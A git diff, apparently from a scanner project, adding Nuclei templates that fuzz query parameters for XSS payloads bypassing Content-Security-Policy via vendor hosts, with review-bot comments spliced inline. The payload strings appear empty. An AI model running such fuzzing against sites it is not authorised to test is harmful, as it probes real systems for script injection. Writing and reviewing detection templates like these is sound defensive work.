index 00000000000..fa2828d7c4e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: suggestqueries-youtube-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via YouTube SuggestQueries
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,youtube
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: suggestqueries_youtube_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "suggestqueries_youtube_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml b/dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml
new file mode 100644
index 00000000000..6e2c9946b9a
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: support-zendesk-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Zendesk Support
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,zendesk
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: support_zendesk_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "support_zendesk_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml
new file mode 100644
index 00000000000..85452b5d1d9
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: swiftype-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Swiftype API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,swiftype
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: swiftype_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "swiftype_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml b/dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml
new file mode 100644
index 00000000000..9d3615ae106
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: sync-im-apps-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via IM Apps Sync
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,im-apps
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: sync_im_apps_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "sync_im_apps_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml
new file mode 100644
index 00000000000..60413f9387e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: tagmanager-google-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Tag Manager
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: tagmanager_google_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "tagmanager_google_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml
new file mode 100644
index 00000000000..1cd217b9730
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml
@@ -0,0 +1,55 @@ +id: tcr9i-openai-csp-xss + +info: + name: Content-Security-Policy Bypass via OpenAI TCR9I + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,openai + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: tcr9i_openai_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "tcr9i_openai_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml b/dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml new file mode 100644 index 00000000000..7b8db0afe94 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml @@ -0,0 +1,55 @@ +id: thehive-shopify-csp-xss + +info: + name: Content-Security-Policy Bypass via Shopify TheHive + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,shopify + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
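Review bot: The headless `navigate` step builds its URL as `{{RootURL}}{{trim_prefix(http_matched, RootURL)}}`; when `http_matched` already begins with `RootURL` this is just `http_matched`, and if it ever does not (for instance if `http_matched` can hold a redirected absolute URL) the two absolute URLs are concatenated into something that is not the matched request. If the intent is simply to revisit the request that reflected the payload, `url: "{{http_matched}}"` says that directly; if the trim is there to force the scan's root origin, a comment stating that would stop the next reader from simplifying it. The same expression appears in every template of this batch, so whichever form is chosen should be applied consistently.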
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: thehive_shopify_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "thehive_shopify_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml b/dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml new file mode 100644 index 00000000000..41371386464 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml @@ -0,0 +1,55 @@ +id: thiscanbeanything-zendesk-csp-xss + +info: + name: Content-Security-Policy Bypass via Zendesk ThisCanBeAnything + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,zendesk + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: thiscanbeanything_zendesk_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "thiscanbeanything_zendesk_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml index 639b8af052c..762cd7ef3e9 100644 
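Review bot: The info block has `name`, `author`, `severity`, `reference` and `tags` but no `description`, so a user reading the finding learns only that "Shopify TheHive" is involved and not what condition on the target makes the bypass work. A one-sentence description stating the precondition would make the result actionable, for example `description: Reflected XSS that still executes under a Content-Security-Policy whose script-src allowlists the Shopify-hosted origin used by the payload; remove that origin from script-src or move to nonce/hash-based script-src.` The exact host should be taken from the payload, which is not legible in this view.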
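Review bot: `metadata: verified: true` is set here, as on every new template in this batch, while the name "ThisCanBeAnything" suggests the allowlisted host is wildcard-like and the template was generated from a dataset row rather than exercised against a target that actually carries such a policy. Since `verified` is used to select templates in scans, it would be better to set it only where the headless alert was observed on a real CSP-protected target and to leave it out otherwise. If each entry was in fact exercised, noting the date or target class in a `description` would make that claim checkable.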
--- a/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml +++ b/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml @@ -2,10 +2,10 @@ id: tiktok-analytics-csp-xss info: name: Content-Security-Policy Bypass via TikTok Analytics - author: DhiyaneshDK - severity: high + author: renniepak,DhiyaneshDK + severity: medium reference: - - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L11C22-L11C115 + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true tags: xss,csp-bypass,tiktok @@ -33,15 +33,23 @@ http: part: body words: - "{{injection}}" + internal: true - - type: word - part: content_type - words: - - "text/html" +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" - - type: word - part: content_security_policy - words: - - "analytics.tiktok.com" - - "script-src" - condition: and \ No newline at end of file + - action: waitload + + - action: waitdialog + name: tiktok_analytics_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "tiktok_analytics_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml new file mode 100644 index 00000000000..ac99d5c7d23 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml 
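Review bot: The hunk drops the `content_security_policy` word matcher for `analytics.tiktok.com` and `script-src` along with the `content_type` check, leaving the HTTP stage to gate on bare reflection and the headless stage on any alert. On a target with no CSP, or a CSP that does not block the payload's host, every template in this `csp/` directory will now fire for the same reflected XSS and each finding will be labelled a "bypass via <vendor>" that the policy never involved, which is both noisy and misattributed. Keeping the header check as an additional `internal: true` matcher (`part: content_security_policy`, `words: ["analytics.tiktok.com"]`) restores the attribution without affecting the headless confirmation. The change also lowers `severity` from high to medium while the demonstrated impact, script execution in the victim's browser despite a CSP, is unchanged; if medium is the project's level for reflected XSS that is fine, but the reasoning belongs in a `description`.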
@@ -0,0 +1,55 @@ +id: translate-google-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Translate + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: translate_google_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "translate_google_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml new file mode 100644 index 00000000000..d4ba9d4fe9b --- /dev/null +++ b/dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: translate-googleapis-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Translate API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: translate_googleapis_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "translate_googleapis_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml b/dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml new file mode 100644 index 00000000000..881620169ca --- /dev/null +++ b/dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml 
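Review bot: `tags: xss,csp-bypass,google` is the same tag set used by `translate-google-csp-xss` and `tagmanager-google-csp-xss` elsewhere in this change, so `-tags google` cannot select or exclude this template on its own. A host-level tag such as `googleapis` (keeping `google` if the shared tag is wanted) would let users run or skip the translate-API gadget separately from the Tag Manager one. The `info.name` already distinguishes them; the tags should too.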
@@ -0,0 +1,55 @@ +id: translate-yandex-csp-xss + +info: + name: Content-Security-Policy Bypass via Yandex Translate + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,yandex + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: translate_yandex_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "translate_yandex_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml new file mode 100644 index 00000000000..f0df4772dde --- /dev/null +++ b/dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: tumblr-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Tumblr API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,tumblr + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: tumblr_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "tumblr_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml new file mode 100644 index 00000000000..baa6e590235 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml 
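Review bot: `matchers-condition: and` is declared with a single matcher in the HTTP stage, so it has no effect and reads as if a second matcher were expected. Either drop the key or keep it and add the CSP-header matcher that would make the condition meaningful (`part: content_security_policy` matching the Tumblr host, with `internal: true`). As written the only gate before the headless stage is that the raw payload text appears in the body.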
@@ -0,0 +1,55 @@ +id: twitter-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Twitter API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,twitter + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: twitter_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "twitter_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml b/dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml new file mode 100644 index 00000000000..fdfb51dce12 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: twitter-csp-xss + +info: + name: Content-Security-Policy Bypass via Twitter + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,twitter + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: twitter_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "twitter_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml b/dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml new file mode 100644 index 00000000000..5ae7610a7bb --- /dev/null +++ b/dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml 
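Review bot: This template and `twitter-api-csp-xss` (the preceding file in this change) are identical apart from `id`, `name` and the payload, and both carry `tags: xss,csp-bypass,twitter`, so a site whose policy allowlists both Twitter hosts will produce two findings for one bug. Nuclei's `payloads: injection:` list accepts several entries, so one `twitter-csp-xss` template with both payloads would report once and is easier to keep current when one gadget dies. If separate files are preferred for reporting, a `description` naming the exact host each one needs would at least let users tell the two findings apart.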
@@ -0,0 +1,55 @@ +id: udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss + +info: + name: Content-Security-Policy Bypass via Vercel Storage + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,vercel + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: udgnoz7mccyaowzp_public_blob_vercel_storage_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "udgnoz7mccyaowzp_public_blob_vercel_storage_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml new file mode 100644 index 00000000000..93d14b06a8d --- /dev/null +++ b/dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml 
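Review bot: The `id` `udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss` embeds what appears to be a single blob-store identifier, while `name` says "via Vercel Storage" as if any Vercel storage host would do; if the gadget only works when a policy allowlists that specific store, the name and a `description` should say so, since few targets will allowlist another customer's store. If instead the bypass applies to the wildcard storage domain, the store identifier does not belong in the id. Either way the host should be written down in the template, because it is not recoverable from the id alone.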
@@ -0,0 +1,55 @@ +id: ug-alibaba-csp-xss + +info: + name: Content-Security-Policy Bypass via Alibaba + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,alibaba + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: ug_alibaba_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "ug_alibaba_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml b/dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml new file mode 100644 index 00000000000..2f34a9f6cfb --- /dev/null +++ b/dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml 
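Review bot: The alert confirmation depends on the headless browser fetching a script from an Alibaba-operated host, and that host may be unreachable or behave differently from scanner networks outside the region, which turns into a silent false negative rather than an error (the `waitdialog` simply times out after `5000` ms). A `description` stating the host the payload loads, and that a failed load yields no finding, would let operators interpret an empty result. The same caveat applies to the other region-specific gadgets in this change, for example the VK and Amap templates that follow.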
@@ -0,0 +1,55 @@ +id: uk-indeed-csp-xss + +info: + name: Content-Security-Policy Bypass via Indeed UK + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,indeed + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: uk_indeed_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "uk_indeed_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml new file mode 100644 index 00000000000..740cc8c9b1a --- /dev/null +++ b/dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: ulogin-csp-xss + +info: + name: Content-Security-Policy Bypass via ULogin + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ulogin + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: ulogin_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "ulogin_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml b/dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml new file mode 100644 index 00000000000..b19d7d86e78 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml @@ -0,0 +1,55 @@ +id: unpkg-angular-csp-xss + +info: + name: Content-Security-Policy Bypass via Unpkg Angular + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,unpkg + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: unpkg_angular_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "unpkg_angular_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml b/dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml new file mode 100644 index 00000000000..af132775dcf --- /dev/null +++ b/dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml @@ -0,0 +1,55 @@ +id: unpkg-hyperscript-csp-xss + +info: + name: Content-Security-Policy Bypass via Unpkg Hyperscript + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,unpkg + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: unpkg_hyperscript_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "unpkg_hyperscript_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml new file mode 100644 index 00000000000..c559750d741 --- /dev/null 
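Review bot: unpkg serves any package published to npm, so a policy that allowlists the unpkg origin is bypassable by far more than Angular, yet this template and `unpkg-hyperscript-csp-xss` encode two particular libraries and will report the same misconfiguration twice. A `description` should state that the root cause is `script-src` allowlisting a public CDN origin rather than anything Angular-specific, so the remediation (pin specific files by hash or drop the origin) is clear. Consolidating the unpkg payloads into one template would also avoid duplicate findings.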
